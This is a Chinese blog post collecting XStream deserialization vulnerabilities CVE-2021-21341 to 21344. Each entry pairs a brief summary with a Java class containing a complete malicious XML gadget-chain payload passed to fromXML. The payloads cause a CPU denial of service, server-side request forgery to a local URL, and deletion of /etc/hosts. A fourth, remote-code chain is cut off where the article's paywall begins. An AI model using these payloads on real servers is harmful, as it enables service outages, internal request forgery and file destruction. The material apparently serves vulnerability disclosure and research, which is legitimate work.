XStream CVE最新漏洞

最新推荐文章于 2024-09-04 22:41:16 发布
最新推荐文章于 2024-09-04 22:41:16 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 安全漏洞 文章标签: 信息安全 java xstream
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40394952/article/details/115634498
版权

XStream CVE漏洞

啦啦啦,我只是官网搬运工:https://x-stream.github.io/index.html

文章目录

CVE-2021-21341

漏洞概述:

在1.4.16版之前的XStream中,存在一个漏洞,该漏洞可能允许远程攻击者根据CPU类型或此类有效负载的并行执行,在目标系统上分配100%CPU时间,从而导致仅通过处理已处理的输入就导致拒绝服务的情况。

public class CVE202121341 {
   
   public static void main(String[] args) {
   
       String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
               "  <unserializable-parents/>\n" +
               "  <java.util.PriorityQueue>\n" +
               "    <default>\n" +
               "      <size>2</size>\n" +
               "      <comparator class='javafx.collections.ObservableList$1'/>\n" +
               "    </default>\n" +
               "    <int>3</int>\n" +
               "    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
               "      <dataHandler>\n" +
               "        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
               "          <is class='java.io.ByteArrayInputStream'>\n" +
               "            <buf></buf>\n" +
               "            <pos>-2147483648</pos>\n" +
               "            <mark>0</mark>\n" +
               "            <count>0</count>\n" +
               "          </is>\n" +
               "          <consumed>false</consumed>\n" +
               "        </dataSource>\n" +
               "        <transferFlavors/>\n" +
               "      </dataHandler>\n" +
               "      <dataLen>0</dataLen>\n" +
               "    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
               "    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\n" +
               "  </java.util.PriorityQueue>\n" +
               "</java.util.PriorityQueue>";
       XStream xstream = new XStream();
       xstream.fromXML(xml);
   }
}

CVE-2021-21342

漏洞概述:
在1.4.16之前的XStream中,存在一个漏洞,在解析时处理的流包含类型信息,以重新创建以前写入的对象。因此,XStream基于这些类型信息创建新的实例。攻击者可以操纵处理后的输入流并替换或注入对象,从而导致服务器端进行伪造请求

public class CVE202121342 {
   
    public static void main(String[] args) {
   
        String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
                "    <unserializable-parents/>\n" +
                "    <java.util.PriorityQueue>\n" +
                "        <default>\n" +
                "            <size>2</size>\n" +
                "            <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
                "                <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
                "                    <packet>\n" +
                "                        <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
                "                            <dataSource class='javax.activation.URLDataSource'>\n" +
                "                                <url>http://localhost:8080/internal/:</url>\n" +
                "                            </dataSource>\n" +
                "                        </message>\n" +
                "                    </packet>\n" +
                "                </indexMap>\n" +
                "            </comparator>\n" +
                "        </default>\n" +
                "        <int>3</int>\n" +
                "        <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
                "        <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
                "    </java.util.PriorityQueue>\n" +
                "</java.util.PriorityQueue>";
        XStream xstream = new XStream();
        xstream.fromXML(xml);

    }
}

CVE-2021-21343

漏洞概述:
在1.4.16之前的XStream中,存在一个漏洞,在解析时处理的流包含类型信息,以重新创建以前写入的对象。因此,XStream基于这些类型信息创建新的实例。攻击者可以操纵处理后的输入流并替换或注入对象,从而删除本地主机上的文件

public class CVE202121343 {
   
    public static void main(String[] args) {
   
        String xml ="<java.util.PriorityQueue serialization='custom'>\n" +
                "  <unserializable-parents/>\n" +
                "  <java.util.PriorityQueue>\n" +
                "    <default>\n" +
                "      <size>2</size>\n" +
                "      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
                "        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
                "          <packet>\n" +
                "            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
                "              <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>\n" +
                "                <part>\n" +
                "                  <dataHead>\n" +
                "                    <tail/>\n" +
                "                    <head>\n" +
                "                      <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>\n" +
                "                        <len>3</len>\n" +
                "                        <data>AQID</data>\n" +
                "                      </data>\n" +
                "                    </head>\n" +
                "                  </dataHead>\n" +
                "                  <contentTransferEncoding>base64</contentTransferEncoding>\n" +
                "                  <msg>\n" +
                "                    <it class='java.util.ArrayList$Itr'>\n" +
                "                      <cursor>0</cursor>\n" +
                "                      <lastRet>1</lastRet>\n" +
                "                      <expectedModCount>4</expectedModCount>\n" +
                "                        <outer-class>\n" +
                "                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
                "                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
                "                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
                "                          <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>\n" +
                "                        </outer-class>\n" +
                "                    </it>\n" +
                "                    <in class='java.io.FileInputStream'>\n" +
                "                      <fd/>\n" +
                "                      <channel class='sun.nio.ch.FileChannelImpl'>\n" +
                "                        <closeLock/>\n" +
                "                        <open>true</open>\n" +
                "                        <threads>\n" +
                "                          <used>-1</used>\n" +
                "                        </threads>\n" +
                "                        <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>\n" +
                "                          <sockClient>\n" +
                "                            <fileName>/etc/hosts</fileName>\n" +
                "                            <unlinkFile>true</unlinkFile>\n" +
                "                          </sockClient>\n" +
                "                          <connectionSync/>\n" +
                "                        </parent>\n" +
                "                      </channel>\n" +
                "                      <closeLock/>\n" +
                "                    </in>\n" +
                "                  </msg>\n" +
                "                </part>\n" +
                "              </dataSource>\n" +
                "            </message>\n" +
                "            <satellites/>\n" +
                "            <invocationProperties/>\n" +
                "          </packet>\n" +
                "        </indexMap>\n" +
                "      </comparator>\n" +
                "    </default>\n" +
                "    <int>3</int>\n" +
                "    <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
                "    <string>javax.xml.ws.binding.attachments.inbound</string>\n" +
                "  </java.util.PriorityQueue>\n" +
                "</java.util.PriorityQueue>";
        XStream xstream = new XStream();
        xstream.fromXML(xml);
    }
}

CVE-2021-21344

漏洞概述:
在1.4.16之前的XStream中,存在一个漏洞,该漏洞可能允许远程攻击者仅通过操纵已处理的输入流来从远程主机加载并执行任意代码。

public class CVE202121344 {
   
    public static void main(String[] args) {
   
        String xml = "<java.util.PriorityQueue serialization='custom'>\n" +
                "  <unserializable-parents/>\n" +
                "  <java.util.PriorityQueue>\n" +
                "    <default>\n" +
                "      <size>2</size>\n" +
                "      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n" +
                "        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n" +
                "          <packet>\n" +
                "            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n" +
                "              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n" +
                "                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n" +
                "                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n" +
                "                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n" +
                "                      <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>\n" +
                "                      <uriProperties/>\n" +
最低0.47元/天 解锁文章
pandamig
关注
专栏目录
OSCS开源安全周报第24期:XStream 栈缓冲区溢出漏洞
OSCS开源安全社区
01-03 823
OSCS 社区共收录安全漏洞 11 个,公开漏洞值得关注的是 XStream < 1.4.20 栈缓冲区溢出漏洞CVE-2022-41966),Linux Kernel ksmbd模块存在任意代码执行漏洞CVE-2022-47939),Squid 存在整数溢出漏洞CVE-2022-41318),MeterSphere
XStream 反序列化命令执行漏洞CVE-2021-21351)
EC_Carrot的博客
08-21 1164
漏洞简介 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。 漏洞复现 由于目标环境Java版本高于8u191,所以我们需要使用org.apache.naming.
漏洞剖析】CVE-2024-38063(Windows IPV6 远程执行代码漏洞)
最新发布
QYbudong的博客
09-04 1896
这也证明之前引发溢出的漏洞并不是单一数据包产生的,我们需要发送多个会被抛弃或或待被处理的ipv6数据包,才能组合触发漏洞。该函数在ipv6数据包重组失败或异常一段时间后被调用,他的代码很少,但在中间部分使用了memmove函数复制缓冲区,顺着这里往上看,它使用IppNetAllocate申请了一块大小为(0xFFD0+8+0x28)再加上一个不超过0x40的值,由于这里是十六位无符号数,所以相加后一定是一个处于0x00和0x50之间的数,远小于0xFFD0,所以下边使用memmove复制内存时会产生溢出。
【组件攻击链】XStream组件高危漏洞分析与利用
further_eye的博客
12-01 2911
XStream组件漏洞主要是java反序列化造成的远程代码执行漏洞,目前官方通过黑名单的方式对java反序列化攻击进行防御,由于黑名单防御机制存在被绕过的风险,因此以后可能会出现类似java反序列化漏洞
XStream 代码问题漏洞CVE-2021-21345)
FCH的博客
08-07 282
目前厂商已发布升级补丁以修复漏洞,建议受影响的用户,及时升级至1.4.16及以上版本。补丁获取链接:https://x-stream.github.io/download.html。这里我们在这边利用 exclusion 排除weixin-java-mp的子依赖,然后再单独引入指定版本的xstream。1,在idea中全文件搜索xstream中没有搜索到,可以在 idea tearminal 中执行命令,查找对应的依赖。xstream:jar:1.4.20 >= 官方建议升级版本1.4.16。
XStream 高危漏洞合集,XStream 组件反序列化漏洞
weixin_45314962的博客
11-27 2397
CVE-2021-29505反序列化代码执行漏洞
Xstream反序列化漏洞
qq_50296568的博客
08-08 726
Xstream库中部分类本身会做反射的 invoke()、序列化的 resovleClass()、readObject()等等,同时这些类的这些操作有被攻击者恶意利用的危险。例如CVE-2020-26217中我们可以通过构造一个包含恶意XML的类。XStream是一个Java库,用于将Java对象序列化为XML格式,也可以将XML格式的数据反序列化为Java对象。它是一个流行的开源库,常用于在分布式系统中传输和存储数据。
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
xstreamCVE漏洞有哪些
04-28
XStreamCVE漏洞主要有以下几个: 1. CVE-2013-7285:XStream反序列化漏洞,攻击者可以通过构造恶意的XML文件来执行任意代码。 2. CVE-2013-7286:XStream反序列化漏洞,攻击者可以通过构造恶意的XML文件来执行...
CVE-2021-29505 XStream远程代码执行漏洞复现
m0_56642842的博客
07-29 1988
0x00 简介 XStream是一个常用的Java对象和XML相互转换的工具,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,大大简化了XML序列化工作。 0x01 漏洞概述 XStream官方发布安全更新,修复了多个XStream 反序列化漏洞,其中就包含了CVE-2021-29505。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2021-29505反序列化代码执行漏洞等。漏洞复杂度低,
【已复现】XStream 拒绝服务漏洞(CVE-2022-41966)安全风险通告
smellycat000的专栏
12-28 4968
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告XStream是一个Java对象和XML相互转换的工具,用来将对象序列化成XML(JSON)或将XML反序列化为对象,并提供所有的基础类型、数组、集合等类型直接转换的支持。近日,奇安信CERT监测到XStream中存在拒绝服务漏洞(CVE-2022-41966),XStream在将XML反序列化为对象时存在堆栈溢出,未...
Xstream漏洞复现(CVE-2021-29505)
Ashely的博客
09-24 3251
Vulhub漏洞环境搭建 拉取漏洞镜像 复现漏洞 一、Vulhub漏洞环境搭建 详见文章Vulhub靶场搭建(Centos7) 二、拉取漏洞镜像 1.进入到vulhub/Xstream/CVE-2021-29505目录下,执行 docker-compose up -d 等待拉取镜像。(默认拉取镜像速度很慢,建议换源,可参考https://blog.csdn.net/weixin_30565327/article/details/101108079) 2. ...
xstream 相关漏洞学习
问题很多的小明
05-28 445
参考:https://www.bbsmax.com/A/kmzLWkWBdG/ 基本使用 xstream主要作用:类与XML互相转换 引入依赖 <dependencies> <dependency> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream</artifactId>
XStream反序列化漏洞分析
weixin_44825990的博客
11-25 1867
XStream反序列化漏洞分析
漏洞复现-Xstream(CVE-2021-29505)
aming小老弟
06-01 1987
Xstream
Java安全』XStream 1.4-1.4.6&1.4.10反序列化漏洞CVE-2013-7285复现与浅析
Ho1aAs‘s Blog
08-12 1934
# 漏洞简介 当XStream反序列化了一个动态代理类,再调用该动态代理类所声明的接口的方法时,就能够触发任意命令执行 > XStream序列化和反序列化分析:https://ho1aas.blog.csdn.net/article/details/126250860 > 动态代理:https://ho1aas.blog.csdn.net/article/details/121647387 # 影响版本 XStream 1.4-1.4.6、1.4.10............
XStream 组件漏洞修复
悟●禅●酒的专栏
04-06 2329
风险描述 XStreamJava 类库中的常用组件,可将Java 对象序列化为XML,反之可将Java 对象和XML 文档相互转换。 XStream 官方发布安全公告,披露多个反序列化漏洞,包括: 1、拒绝服务漏洞CVE-2021-21341/21348)攻击者可利用该漏洞操纵已处理的输入流并替换或注入对象,执行恶意正则表达式的计算,从而造成拒绝服务攻击。 2、服务端请求伪造漏洞CVE-2021-21342/21349)攻击者可利用该漏洞操纵已处理的输入流并替换或注入对象,从而伪造服务端请求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pandamig

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值